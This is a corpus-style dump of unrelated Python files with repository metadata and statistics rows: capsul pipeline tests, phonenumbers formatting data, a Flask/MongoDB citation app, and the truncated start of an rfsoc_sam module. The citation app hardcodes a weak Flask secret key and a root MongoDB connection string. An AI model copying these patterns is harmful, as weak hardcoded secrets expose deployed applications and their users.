pipeline = Runtime(cmds, ReportingJobQueue, { 'local': MockJob }, 'local', sleep_time=0.01)
iters = pipeline.run()
iters.should.be.greater_than(30)
| 23.714953
| 95
| 0.680591
| 669
| 5,075
| 4.998505
| 0.101644
| 0.050239
| 0.075359
| 0.226077
| 0.874103
| 0.817584
| 0.796053
| 0.796053
| 0.796053
| 0.796053
| 0
| 0.027119
| 0.186207
| 5,075
| 213
| 96
| 23.826291
| 0.782567
| 0.013596
| 0
| 0.635037
| 0
| 0
| 0.019808
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.153285
| false
| 0
| 0.051095
| 0
| 0.20438
| 0.007299
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
367900d28fef54f80589236fe00ac1e9552b73c6
| 500
|
py
|
Python
|
tech_project/lib/python2.7/site-packages/phonenumbers/data/alt_format_595.py
|
priyamshah112/Project-Descripton-Blog
|
8e01016c6be79776c4f5ca75563fa3daa839e39e
|
[
"MIT"
] | 7
|
2019-05-20T09:57:02.000Z
|
2020-01-10T05:30:48.000Z
|
python/phonenumbers/data/alt_format_595.py
|
carljm/python-phonenumbers
|
494044aaf75443dbfd62b8d1352b441af6a458ae
|
[
"Apache-2.0"
] | 5
|
2020-03-24T16:37:25.000Z
|
2021-06-10T21:24:54.000Z
|
python/phonenumbers/data/alt_format_595.py
|
carljm/python-phonenumbers
|
494044aaf75443dbfd62b8d1352b441af6a458ae
|
[
"Apache-2.0"
] | 1
|
2019-04-20T05:26:27.000Z
|
2019-04-20T05:26:27.000Z
|
"""Auto-generated file, do not edit by hand. 595 metadata"""
from ..phonemetadata import NumberFormat
PHONE_ALT_FORMAT_595 = [NumberFormat(pattern='(\\d{2})(\\d{2})(\\d{3})', format='\\1 \\2 \\3', leading_digits_pattern=['(?:[26]1|3[289]|4[124678]|7[123]|8[1236])']), NumberFormat(pattern='(\\d{2})(\\d{6,7})', format='\\1 \\2', leading_digits_pattern=['(?:[26]1|3[289]|4[124678]|7[123]|8[1236])']), NumberFormat(pattern='(\\d{3})(\\d{6})', format='\\1 \\2', leading_digits_pattern=['[2-8][1-9]'])]
| 100
| 396
| 0.622
| 82
| 500
| 3.682927
| 0.414634
| 0.188742
| 0.198676
| 0.139073
| 0.615894
| 0.536424
| 0.417219
| 0.417219
| 0.417219
| 0.417219
| 0
| 0.150743
| 0.058
| 500
| 4
| 397
| 125
| 0.490446
| 0.108
| 0
| 0
| 1
| 1
| 0.397727
| 0.240909
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.5
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
369dadc15efedfccd0c68a0a192cbea70b90d47f
| 6,867
|
py
|
Python
|
models.py
|
sushaanpatel/citation-site
|
5e1707ced9246350c05eeb5d9badb1089f6f6647
|
[
"Apache-2.0"
] | null | null | null |
models.py
|
sushaanpatel/citation-site
|
5e1707ced9246350c05eeb5d9badb1089f6f6647
|
[
"Apache-2.0"
] | null | null | null |
models.py
|
sushaanpatel/citation-site
|
5e1707ced9246350c05eeb5d9badb1089f6f6647
|
[
"Apache-2.0"
] | null | null | null |
import os
import dotenv
from bson.objectid import ObjectId
from flask import Flask, render_template, request, redirect, url_for, session
from flask_pymongo import PyMongo, ObjectId
from scraper import scrape
dotenv.load_dotenv()
password = os.environ.get('PASS')
app = Flask(__name__)
app.config["MONGO_URI"] = f'mongodb+srv://root:{password}@memes.2xsyj.mongodb.net/citation?retryWrites=true&w=majority'
app.config["SECRET_KEY"] = f'secretkeysecretkey'
mongo = PyMongo(app)
class Citation:
def __init__(self,author,publisher,ac_date,year,url,username, web_title, folder):
self.author = author
self.ac_date = ac_date
self.year = year
self.publisher = publisher
self.url = url
self.username = username
self.web_title = web_title
self.folder = folder
class Website(Citation):
def citeit(self):
a = self.author.split(' ')
web = scrape(self.url)
title = web['title']
icon = web['icon']
fname = None
lname = None
text = None
year = self.year.split('-')[0]
if (len(a) == 1):
lname = a[0]
text = (f"""{lname}. "{title}" {self.publisher if self.publisher != "" else "Np"}., {year + ". " if year != "" else ""}Web. {self.ac_date}. <{self.url}>.""")
else:
fname = a[0]
lname = a[1]
text = (f"""{lname}, {fname}. "{title}" {self.publisher if self.publisher != "" else "Np"}., {year + ". " if year != "" else ""}Web. {self.ac_date}. <{self.url}>.""")
if (self.author == ""):
text = (f""""{title}" {self.publisher if self.publisher != "" else "Np"}., {year + ". " if year != "" else ""}Web. {self.ac_date}. <{self.url}>.""")
if self.username != 'ano':
mongo.db.cites.insert_one({'user': self.username, 'author': self.author, 'web_title': title, 'ac_date': self.ac_date, 'pub_year': self.year, 'publisher': self.publisher, 'url': self.url, 'full_citation': text, 'icon': icon, 'type': 'web', 'tags': self.folder})
else:
if 'citation' in session:
clist = list(session['citation'])
clist.append({'user': self.username, 'author': self.author, 'web_title': title, 'ac_date': self.ac_date, 'pub_year': self.year, 'publisher': self.publisher, 'url': self.url, 'full_citation': text, 'icon': icon, 'type': 'web'})
session['citation'] = clist
else:
session['citation'] = [{'user': self.username, 'author': self.author, 'web_title': title, 'ac_date': self.ac_date, 'pub_year': self.year, 'publisher': self.publisher, 'url': self.url, 'full_citation': text, 'icon': icon, 'type': 'web'}]
def update(self, cid):
a = self.author.split(' ')
web = scrape(self.url)
title = web['title']
icon = web['icon']
fname = None
lname = None
text = None
year = self.year.split('-')[0]
if (len(a) == 1):
lname = a[0]
text = (f"""{lname}. "{title}" {self.publisher if self.publisher != "" else "Np"}., {year + ". " if year != "" else ""}Web. {self.ac_date}. <{self.url}>.""")
else:
fname = a[0]
lname = a[1]
text = (f"""{lname}, {fname}. "{title}" {self.publisher if self.publisher != "" else "Np"}., {year + ". " if year != "" else ""}Web. {self.ac_date}. <{self.url}>.""")
if (self.author == ""):
text = (f""""{title}" {self.publisher if self.publisher != "" else "Np"}., {year + ". " if year != "" else ""}Web. {self.ac_date}. <{self.url}>.""")
mongo.db.cites.update_one({'_id': ObjectId(cid)},{"$set": {'user': self.username, 'author': self.author, 'web_title': title, 'ac_date': self.ac_date, 'pub_year': self.year, 'publisher': self.publisher, 'url': self.url, 'full_citation': text, 'icon': icon, 'type': 'web', 'tags': self.folder}})
"""Wikipedia. Taking Photo. 2022. Web. 7 Feb. 2022 . <https://upload.wikimedia.org/wikipedia/commons/thumb/b/b6/Image_created_with_a_mobile_phone.png/330px-Image_created_with_a_mobile_phone.png>."""
class Image(Citation):
def citeit(self):
a = self.author.split(' ')
title = self.web_title
icon = self.url
fname = None
lname = None
text = None
year = self.year.split('-')[0]
if (len(a) == 1):
lname = a[0]
text = (f"""{lname}. {title}. {year + ". " if year != "" else ""}Web. {self.ac_date}. <{self.url}>.""")
else:
fname = a[0]
lname = a[1]
text = (f"""{lname}, {fname}. {title}. {year + ". " if year != "" else ""}Web. {self.ac_date}. <{self.url}>.""")
if (self.author == ""):
text = (f"""{title}. {year + ". " if year != "" else ""}Web. {self.ac_date}. <{self.url}>.""")
if self.username != 'ano':
mongo.db.cites.insert_one({'user': self.username, 'author': self.author, 'web_title': title, 'ac_date': self.ac_date, 'pub_year': self.year, 'publisher': self.publisher, 'url': self.url, 'full_citation': text, 'icon': icon, 'type': 'img', 'tags': self.folder})
else:
if 'citation' in session:
clist = list(session['citation'])
clist.append({'user': self.username, 'author': self.author, 'web_title': title, 'ac_date': self.ac_date, 'pub_year': self.year, 'publisher': self.publisher, 'url': self.url, 'full_citation': text, 'icon': icon, 'type': 'img'})
session['citation'] = clist
else:
session['citation'] = [{'user': self.username, 'author': self.author, 'web_title': title, 'ac_date': self.ac_date, 'pub_year': self.year, 'publisher': self.publisher, 'url': self.url, 'full_citation': text, 'icon': icon, 'type': 'img'}]
def update(self, cid):
a = self.author.split(' ')
title = self.web_title
icon = self.url
fname = None
lname = None
text = None
year = self.year.split('-')[0]
if (len(a) == 1):
lname = a[0]
text = (f"""{lname}. {title}. {year + ". " if year != "" else ""}Web. {self.ac_date}. <{self.url}>.""")
else:
fname = a[0]
lname = a[1]
text = (f"""{lname}, {fname}. {title}. {year + ". " if year != "" else ""}Web. {self.ac_date}. <{self.url}>.""")
if (self.author == ""):
text = (f"""{title}. {year + ". " if year != "" else ""}Web. {self.ac_date}. <{self.url}>.""")
mongo.db.cites.update_one({'_id': ObjectId(cid)},{"$set": {'user': self.username, 'author': self.author, 'web_title': title, 'ac_date': self.ac_date, 'pub_year': self.year, 'publisher': self.publisher, 'url': self.url, 'full_citation': text, 'icon': icon, 'type': 'img', 'tags': self.folder}})
| 55.829268
| 301
| 0.548274
| 865
| 6,867
| 4.248555
| 0.127168
| 0.050612
| 0.057143
| 0.045714
| 0.81415
| 0.81415
| 0.81415
| 0.797279
| 0.777143
| 0.777143
| 0
| 0.006571
| 0.246541
| 6,867
| 123
| 302
| 55.829268
| 0.703711
| 0
| 0
| 0.719298
| 0
| 0.114035
| 0.327586
| 0.013493
| 0
| 0
| 0
| 0
| 0
| 1
| 0.04386
| false
| 0.017544
| 0.052632
| 0
| 0.122807
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
36a45f70c50fa4ca2fd72432c9ce4b4b423a903c
| 35,674
|
py
|
Python
|
capsul/pipeline/test/test_complex_pipeline_activations.py
|
servoz/capsul
|
2d72228c096f1c43ecfca7f3651b353dc35e209e
|
[
"CECILL-B"
] | null | null | null |
capsul/pipeline/test/test_complex_pipeline_activations.py
|
servoz/capsul
|
2d72228c096f1c43ecfca7f3651b353dc35e209e
|
[
"CECILL-B"
] | null | null | null |
capsul/pipeline/test/test_complex_pipeline_activations.py
|
servoz/capsul
|
2d72228c096f1c43ecfca7f3651b353dc35e209e
|
[
"CECILL-B"
] | null | null | null |
# -*- coding: utf-8 -*-
from __future__ import print_function
from __future__ import absolute_import
import os
import shutil
import unittest
import tempfile
import sys
import six
from traits.api import File
from capsul.api import Process, Pipeline, Switch, get_process_instance
class Identity(Process):
input_image = File(optional=False, output=False)
output_image = File(optional=False, output=True)
class ComplexPipeline(Pipeline):
"""Pipeline to test complex constructions behaviours
"""
def pipeline_definition(self):
# Create processes
self.add_process('first_pipeline',
'capsul.process.test.test_pipeline')
self.add_process('pipeline_1',
'capsul.process.test.test_pipeline',
make_optional=['output_1', 'output_10','output_100'])
#self.export_parameter('pipeline_1', 'output_1')
self.add_process('pipeline_10',
'capsul.process.test.test_pipeline',
make_optional=['output_1', 'output_10','output_100'])
self.add_process('pipeline_100',
'capsul.process.test.test_pipeline',
make_optional=['output_1', 'output_10','output_100'])
self.add_switch('select_threshold', ['threshold_1', 'threshold_10', 'threshold_100'], ['output_a', 'output_b', 'output_c'])
self.add_process('identity_a', Identity)
self.add_process('identity_b', Identity)
self.add_process('identity_c', Identity)
self.export_parameter('first_pipeline', 'select_method')
self.add_link('select_method->pipeline_1.select_method')
self.add_link('select_method->pipeline_10.select_method')
self.add_link('select_method->pipeline_100.select_method')
self.add_link('first_pipeline.output_1->pipeline_1.input_image')
self.add_link('first_pipeline.output_10->pipeline_10.input_image')
self.add_link('first_pipeline.output_100->pipeline_100.input_image')
self.add_link('pipeline_1.output_1->select_threshold.threshold_1_switch_output_a')
self.add_link('pipeline_1.output_10->select_threshold.threshold_10_switch_output_a')
self.add_link('pipeline_1.output_100->select_threshold.threshold_100_switch_output_a')
self.add_link('pipeline_10.output_1->select_threshold.threshold_1_switch_output_b')
self.add_link('pipeline_10.output_10->select_threshold.threshold_10_switch_output_b')
self.add_link('pipeline_10.output_100->select_threshold.threshold_100_switch_output_b')
self.add_link('pipeline_100.output_1->select_threshold.threshold_1_switch_output_c')
self.add_link('pipeline_100.output_10->select_threshold.threshold_10_switch_output_c')
self.add_link('pipeline_100.output_100->select_threshold.threshold_100_switch_output_c')
self.add_link('select_threshold.output_a->identity_a.input_image')
self.add_link('select_threshold.output_b->identity_b.input_image')
self.add_link('select_threshold.output_c->identity_c.input_image')
self.export_parameter('identity_a', 'output_image', 'output_a')
self.export_parameter('identity_b', 'output_image', 'output_b')
self.export_parameter('identity_c', 'output_image', 'output_c')
self.node_position = {'first_pipeline': (118.0, 486.0),
'identity_a': (870.0, 644.0),
'identity_b': (867.0, 742.0),
'identity_c': (866.0, 846.0),
'inputs': (-107.0, 491.0),
'outputs': (1111.0, 723.0),
'pipeline_1': (329.0, 334.0),
'pipeline_10': (331.0, 533.0),
'pipeline_100': (334.0, 738.0),
'select_threshold': (559.0, 453.0)}
class TestComplexPipeline(unittest.TestCase):
expected_status = [
({},
{
'': {
'_activated': True,
'_enabled': True,
},
'first_pipeline': {
'_activated': True,
'_enabled': True,
},
'first_pipeline.threshold_gt_1': {
'_activated': True,
'_enabled': True,
},
'first_pipeline.threshold_gt_10': {
'_activated': True,
'_enabled': True,
},
'first_pipeline.threshold_gt_100': {
'_activated': True,
'_enabled': True,
},
'first_pipeline.threshold_lt_1': {
'_activated': False,
'_enabled': False,
},
'first_pipeline.threshold_lt_10': {
'_activated': False,
'_enabled': False,
},
'first_pipeline.threshold_lt_100': {
'_activated': False,
'_enabled': False,
},
'first_pipeline.mask_1': {
'_activated': True,
'_enabled': True,
},
'first_pipeline.mask_10': {
'_activated': True,
'_enabled': True,
},
'first_pipeline.mask_100': {
'_activated': True,
'_enabled': True,
},
'pipeline_1': {
'_activated': True,
'_enabled': True,
},
'pipeline_1.threshold_gt_1': {
'_activated': True,
'_enabled': True,
},
'pipeline_1.threshold_gt_10': {
'_activated': False,
'_enabled': True,
},
'pipeline_1.threshold_gt_100': {
'_activated': False,
'_enabled': True,
},
'pipeline_1.threshold_lt_1': {
'_activated': False,
'_enabled': False,
},
'pipeline_1.threshold_lt_10': {
'_activated': False,
'_enabled': False,
},
'pipeline_1.threshold_lt_100': {
'_activated': False,
'_enabled': False,
},
'pipeline_1.mask_1': {
'_activated': True,
'_enabled': True,
},
'pipeline_1.mask_10': {
'_activated': False,
'_enabled': True,
},
'pipeline_1.mask_100': {
'_activated': False,
'_enabled': True,
},
'pipeline_10': {
'_activated': True,
'_enabled': True,
},
'pipeline_10.threshold_gt_1': {
'_activated': True,
'_enabled': True,
},
'pipeline_10.threshold_gt_10': {
'_activated': False,
'_enabled': True,
},
'pipeline_10.threshold_gt_100': {
'_activated': False,
'_enabled': True,
},
'pipeline_10.threshold_lt_1': {
'_activated': False,
'_enabled': False,
},
'pipeline_10.threshold_lt_10': {
'_activated': False,
'_enabled': False,
},
'pipeline_10.threshold_lt_100': {
'_activated': False,
'_enabled': False,
},
'pipeline_10.mask_1': {
'_activated': True,
'_enabled': True,
},
'pipeline_10.mask_10': {
'_activated': False,
'_enabled': True,
},
'pipeline_10.mask_100': {
'_activated': False,
'_enabled': True,
},
'pipeline_100': {
'_activated': True,
'_enabled': True,
},
'pipeline_100.threshold_gt_1': {
'_activated': True,
'_enabled': True,
},
'pipeline_100.threshold_gt_10': {
'_activated': False,
'_enabled': True,
},
'pipeline_100.threshold_gt_100': {
'_activated': False,
'_enabled': True,
},
'pipeline_100.threshold_lt_1': {
'_activated': False,
'_enabled': False,
},
'pipeline_100.threshold_lt_10': {
'_activated': False,
'_enabled': False,
},
'pipeline_100.threshold_lt_100': {
'_activated': False,
'_enabled': False,
},
'pipeline_100.mask_1': {
'_activated': True,
'_enabled': True,
},
'pipeline_100.mask_10': {
'_activated': False,
'_enabled': True,
},
'pipeline_100.mask_100': {
'_activated': False,
'_enabled': True,
},
'select_threshold': {
'_activated': True,
'_enabled': True,
},
'identity_a': {
'_activated': True,
'_enabled': True,
},
'identity_b': {
'_activated': True,
'_enabled': True,
},
'identity_c': {
'_activated': True,
'_enabled': True,
},
}
),
({'select_method': 'lower than'},
{
'': {
'_activated': True,
'_enabled': True,
},
'first_pipeline': {
'_activated': True,
'_enabled': True,
},
'first_pipeline.threshold_lt_1': {
'_activated': True,
'_enabled': True,
},
'first_pipeline.threshold_lt_10': {
'_activated': True,
'_enabled': True,
},
'first_pipeline.threshold_lt_100': {
'_activated': True,
'_enabled': True,
},
'first_pipeline.threshold_gt_1': {
'_activated': False,
'_enabled': False,
},
'first_pipeline.threshold_gt_10': {
'_activated': False,
'_enabled': False,
},
'first_pipeline.threshold_gt_100': {
'_activated': False,
'_enabled': False,
},
'first_pipeline.mask_1': {
'_activated': True,
'_enabled': True,
},
'first_pipeline.mask_10': {
'_activated': True,
'_enabled': True,
},
'first_pipeline.mask_100': {
'_activated': True,
'_enabled': True,
},
'pipeline_1': {
'_activated': True,
'_enabled': True,
},
'pipeline_1.threshold_lt_1': {
'_activated': True,
'_enabled': True,
},
'pipeline_1.threshold_lt_10': {
'_activated': False,
'_enabled': True,
},
'pipeline_1.threshold_lt_100': {
'_activated': False,
'_enabled': True,
},
'pipeline_1.threshold_gt_1': {
'_activated': False,
'_enabled': False,
},
'pipeline_1.threshold_gt_10': {
'_activated': False,
'_enabled': False,
},
'pipeline_1.threshold_gt_100': {
'_activated': False,
'_enabled': False,
},
'pipeline_1.mask_1': {
'_activated': True,
'_enabled': True,
},
'pipeline_1.mask_10': {
'_activated': False,
'_enabled': True,
},
'pipeline_1.mask_100': {
'_activated': False,
'_enabled': True,
},
'pipeline_10': {
'_activated': True,
'_enabled': True,
},
'pipeline_10.threshold_lt_1': {
'_activated': True,
'_enabled': True,
},
'pipeline_10.threshold_lt_10': {
'_activated': False,
'_enabled': True,
},
'pipeline_10.threshold_lt_100': {
'_activated': False,
'_enabled': True,
},
'pipeline_10.threshold_gt_1': {
'_activated': False,
'_enabled': False,
},
'pipeline_10.threshold_gt_10': {
'_activated': False,
'_enabled': False,
},
'pipeline_10.threshold_gt_100': {
'_activated': False,
'_enabled': False,
},
'pipeline_10.mask_1': {
'_activated': True,
'_enabled': True,
},
'pipeline_10.mask_10': {
'_activated': False,
'_enabled': True,
},
'pipeline_10.mask_100': {
'_activated': False,
'_enabled': True,
},
'pipeline_100': {
'_activated': True,
'_enabled': True,
},
'pipeline_100.threshold_lt_1': {
'_activated': True,
'_enabled': True,
},
'pipeline_100.threshold_lt_10': {
'_activated': False,
'_enabled': True,
},
'pipeline_100.threshold_lt_100': {
'_activated': False,
'_enabled': True,
},
'pipeline_100.threshold_gt_1': {
'_activated': False,
'_enabled': False,
},
'pipeline_100.threshold_gt_10': {
'_activated': False,
'_enabled': False,
},
'pipeline_100.threshold_gt_100': {
'_activated': False,
'_enabled': False,
},
'pipeline_100.mask_1': {
'_activated': True,
'_enabled': True,
},
'pipeline_100.mask_10': {
'_activated': False,
'_enabled': True,
},
'pipeline_100.mask_100': {
'_activated': False,
'_enabled': True,
},
'select_threshold': {
'_activated': True,
'_enabled': True,
},
'identity_a': {
'_activated': True,
'_enabled': True,
},
'identity_b': {
'_activated': True,
'_enabled': True,
},
'identity_c': {
'_activated': True,
'_enabled': True,
},
}
),
({'select_threshold': 'threshold_10'},
{
'': {
'_activated': True,
'_enabled': True,
},
'first_pipeline': {
'_activated': True,
'_enabled': True,
},
'first_pipeline.threshold_gt_1': {
'_activated': True,
'_enabled': True,
},
'first_pipeline.threshold_gt_10': {
'_activated': True,
'_enabled': True,
},
'first_pipeline.threshold_gt_100': {
'_activated': True,
'_enabled': True,
},
'first_pipeline.threshold_lt_1': {
'_activated': False,
'_enabled': False,
},
'first_pipeline.threshold_lt_10': {
'_activated': False,
'_enabled': False,
},
'first_pipeline.threshold_lt_100': {
'_activated': False,
'_enabled': False,
},
'first_pipeline.mask_1': {
'_activated': True,
'_enabled': True,
},
'first_pipeline.mask_10': {
'_activated': True,
'_enabled': True,
},
'first_pipeline.mask_100': {
'_activated': True,
'_enabled': True,
},
'pipeline_1': {
'_activated': True,
'_enabled': True,
},
'pipeline_1.threshold_gt_1': {
'_activated': False,
'_enabled': True,
},
'pipeline_1.threshold_gt_10': {
'_activated': True,
'_enabled': True,
},
'pipeline_1.threshold_gt_100': {
'_activated': False,
'_enabled': True,
},
'pipeline_1.threshold_lt_1': {
'_activated': False,
'_enabled': False,
},
'pipeline_1.threshold_lt_10': {
'_activated': False,
'_enabled': False,
},
'pipeline_1.threshold_lt_100': {
'_activated': False,
'_enabled': False,
},
'pipeline_1.mask_1': {
'_activated': False,
'_enabled': True,
},
'pipeline_1.mask_10': {
'_activated': True,
'_enabled': True,
},
'pipeline_1.mask_100': {
'_activated': False,
'_enabled': True,
},
'pipeline_10': {
'_activated': True,
'_enabled': True,
},
'pipeline_10.threshold_gt_1': {
'_activated': False,
'_enabled': True,
},
'pipeline_10.threshold_gt_10': {
'_activated': True,
'_enabled': True,
},
'pipeline_10.threshold_gt_100': {
'_activated': False,
'_enabled': True,
},
'pipeline_10.threshold_lt_1': {
'_activated': False,
'_enabled': False,
},
'pipeline_10.threshold_lt_10': {
'_activated': False,
'_enabled': False,
},
'pipeline_10.threshold_lt_100': {
'_activated': False,
'_enabled': False,
},
'pipeline_10.mask_1': {
'_activated': False,
'_enabled': True,
},
'pipeline_10.mask_10': {
'_activated': True,
'_enabled': True,
},
'pipeline_10.mask_100': {
'_activated': False,
'_enabled': True,
},
'pipeline_100': {
'_activated': True,
'_enabled': True,
},
'pipeline_100.threshold_gt_1': {
'_activated': False,
'_enabled': True,
},
'pipeline_100.threshold_gt_10': {
'_activated': True,
'_enabled': True,
},
'pipeline_100.threshold_gt_100': {
'_activated': False,
'_enabled': True,
},
'pipeline_100.threshold_lt_1': {
'_activated': False,
'_enabled': False,
},
'pipeline_100.threshold_lt_10': {
'_activated': False,
'_enabled': False,
},
'pipeline_100.threshold_lt_100': {
'_activated': False,
'_enabled': False,
},
'pipeline_100.mask_1': {
'_activated': False,
'_enabled': True,
},
'pipeline_100.mask_10': {
'_activated': True,
'_enabled': True,
},
'pipeline_100.mask_100': {
'_activated': False,
'_enabled': True,
},
'select_threshold': {
'_activated': True,
'_enabled': True,
},
'identity_a': {
'_activated': True,
'_enabled': True,
},
'identity_b': {
'_activated': True,
'_enabled': True,
},
'identity_c': {
'_activated': True,
'_enabled': True,
},
}
),
({'select_threshold': 'threshold_10',
'select_method': 'lower than'},
{
'': {
'_activated': True,
'_enabled': True,
},
'first_pipeline': {
'_activated': True,
'_enabled': True,
},
'first_pipeline.threshold_lt_1': {
'_activated': True,
'_enabled': True,
},
'first_pipeline.threshold_lt_10': {
'_activated': True,
'_enabled': True,
},
'first_pipeline.threshold_lt_100': {
'_activated': True,
'_enabled': True,
},
'first_pipeline.threshold_gt_1': {
'_activated': False,
'_enabled': False,
},
'first_pipeline.threshold_gt_10': {
'_activated': False,
'_enabled': False,
},
'first_pipeline.threshold_gt_100': {
'_activated': False,
'_enabled': False,
},
'first_pipeline.mask_1': {
'_activated': True,
'_enabled': True,
},
'first_pipeline.mask_10': {
'_activated': True,
'_enabled': True,
},
'first_pipeline.mask_100': {
'_activated': True,
'_enabled': True,
},
'pipeline_1': {
'_activated': True,
'_enabled': True,
},
'pipeline_1.threshold_lt_1': {
'_activated': False,
'_enabled': True,
},
'pipeline_1.threshold_lt_10': {
'_activated': True,
'_enabled': True,
},
'pipeline_1.threshold_lt_100': {
'_activated': False,
'_enabled': True,
},
'pipeline_1.threshold_gt_1': {
'_activated': False,
'_enabled': False,
},
'pipeline_1.threshold_gt_10': {
'_activated': False,
'_enabled': False,
},
'pipeline_1.threshold_gt_100': {
'_activated': False,
'_enabled': False,
},
'pipeline_1.mask_1': {
'_activated': False,
'_enabled': True,
},
'pipeline_1.mask_10': {
'_activated': True,
'_enabled': True,
},
'pipeline_1.mask_100': {
'_activated': False,
'_enabled': True,
},
'pipeline_10': {
'_activated': True,
'_enabled': True,
},
'pipeline_10.threshold_lt_1': {
'_activated': False,
'_enabled': True,
},
'pipeline_10.threshold_lt_10': {
'_activated': True,
'_enabled': True,
},
'pipeline_10.threshold_lt_100': {
'_activated': False,
'_enabled': True,
},
'pipeline_10.threshold_gt_1': {
'_activated': False,
'_enabled': False,
},
'pipeline_10.threshold_gt_10': {
'_activated': False,
'_enabled': False,
},
'pipeline_10.threshold_gt_100': {
'_activated': False,
'_enabled': False,
},
'pipeline_10.mask_1': {
'_activated': False,
'_enabled': True,
},
'pipeline_10.mask_10': {
'_activated': True,
'_enabled': True,
},
'pipeline_10.mask_100': {
'_activated': False,
'_enabled': True,
},
'pipeline_100': {
'_activated': True,
'_enabled': True,
},
'pipeline_100.threshold_lt_1': {
'_activated': False,
'_enabled': True,
},
'pipeline_100.threshold_lt_10': {
'_activated': True,
'_enabled': True,
},
'pipeline_100.threshold_lt_100': {
'_activated': False,
'_enabled': True,
},
'pipeline_100.threshold_gt_1': {
'_activated': False,
'_enabled': False,
},
'pipeline_100.threshold_gt_10': {
'_activated': False,
'_enabled': False,
},
'pipeline_100.threshold_gt_100': {
'_activated': False,
'_enabled': False,
},
'pipeline_100.mask_1': {
'_activated': False,
'_enabled': True,
},
'pipeline_100.mask_10': {
'_activated': True,
'_enabled': True,
},
'pipeline_100.mask_100': {
'_activated': False,
'_enabled': True,
},
'select_threshold': {
'_activated': True,
'_enabled': True,
},
'identity_a': {
'_activated': True,
'_enabled': True,
},
'identity_b': {
'_activated': True,
'_enabled': True,
},
'identity_c': {
'_activated': True,
'_enabled': True,
},
}
),
]
def test_activations(self):
for kwargs, activations_to_check in self.expected_status:
pipeline = get_process_instance(ComplexPipeline, **kwargs)
for full_node_name, node_activations in six.iteritems(activations_to_check):
split = full_node_name.split('.')
node_pipeline = pipeline
for i in split[:-1]:
node_pipeline = node_pipeline.nodes[i].process
node_name = split[-1]
try:
node = node_pipeline.nodes[node_name]
except KeyError:
raise KeyError('Pipeline {0} has no node named {1}'.format(node_pipeline.pipeline, node_name))
try:
what = 'activation of node {0}'.format(full_node_name or 'main pipeline node')
expected = node_activations.get('_activated')
if expected is not None:
got = node.activated
self.assertEqual(expected, got)
what = 'enabled for node {0}'.format(full_node_name or 'main pipeline node')
expected = node_activations.get('_enabled')
if expected is not None:
got = node.enabled
self.assertEqual(expected, got)
except AssertionError:
raise AssertionError('Wrong activation within ComplexPipeline with parameters {0}: {1} is supposed to be {2} but is {3}'.format(kwargs, what, expected, got))
def test():
""" Function to execute unitest
"""
suite = unittest.TestLoader().loadTestsFromTestCase(TestComplexPipeline)
runtime = unittest.TextTestRunner(verbosity=2).run(suite)
return runtime.wasSuccessful()
if __name__ == '__main__':
print('Test return code:', test())
if '-v' in sys.argv[1:]:
from pprint import pprint
pipeline = get_process_instance(ComplexPipeline)
from soma.qt_gui.qt_backend import QtGui
from capsul.qt_gui.widgets import PipelineDeveloperView
#from capsul.qt_gui.widgets.activation_inspector import ActivationInspectorApp
#app = ActivationInspectorApp(ComplexPipeline)
app = QtGui.QApplication(sys.argv)
view = PipelineDeveloperView(pipeline, allow_open_controller=True, show_sub_pipelines=True)
view.show()
app.exec_()
del view
| 39.462389
| 173
| 0.3613
| 2,228
| 35,674
| 5.324506
| 0.075404
| 0.122397
| 0.16994
| 0.16994
| 0.812695
| 0.787996
| 0.780578
| 0.772823
| 0.684228
| 0.655568
| 0
| 0.045184
| 0.543393
| 35,674
| 903
| 174
| 39.506091
| 0.683099
| 0.008297
| 0
| 0.658768
| 0
| 0.001185
| 0.260053
| 0.117923
| 0
| 0
| 0
| 0
| 0.004739
| 1
| 0.003555
| false
| 0
| 0.015403
| 0
| 0.027251
| 0.003555
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
36e961b14e2a2d0ff60c8ae3a895c07593dbf956
| 109,596
|
py
|
Python
|
rfsoc_sam/receiver_frontend.py
|
schelleg/rfsoc_sam
|
2a4ae0fc1686d1e3146cbea5d8578c7432910b92
|
[
"BSD-3-Clause"
] | null | null | null |
rfsoc_sam/receiver_frontend.py
|
schelleg/rfsoc_sam
|
2a4ae0fc1686d1e3146cbea5d8578c7432910b92
|
[
"BSD-3-Clause"
] | null | null | null |
rfsoc_sam/receiver_frontend.py
|
schelleg/rfsoc_sam
|
2a4ae0fc1686d1e3146cbea5d8578c7432910b92
|
[
"BSD-3-Clause"
] | null | null | null |
__author__ = "David Northcote"
__organisation__ = "The Univeristy of Strathclyde"
__support__ = "https://github.com/strath-sdr/rfsoc_sam"
import numpy as np
import ipywidgets as ipw
import plotly.graph_objs as go
import matplotlib.colors as mcolors
import time
from .spectrum_analyser import SpectrumAnalyser
from .bandwidth_selector import BandwidthSelector
from .quick_widgets import FloatText, IntText, Button, Accordion, DropDown, Label, Image, CheckBox, QuickButton
DDC_SPURS = ['rx_alias', 'rx_image', 'nyquist_up', 'nyquist_down',
'hd2', 'hd2_image', 'hd3', 'hd3_image',
'pll_mix_up', 'pll_mix_up_image', 'pll_mix_down', 'pll_mix_down_image',
'tis_spur', 'tis_spur_image', 'offset_spur', 'offset_spur_image']
class RadioOfdmAnalyser():
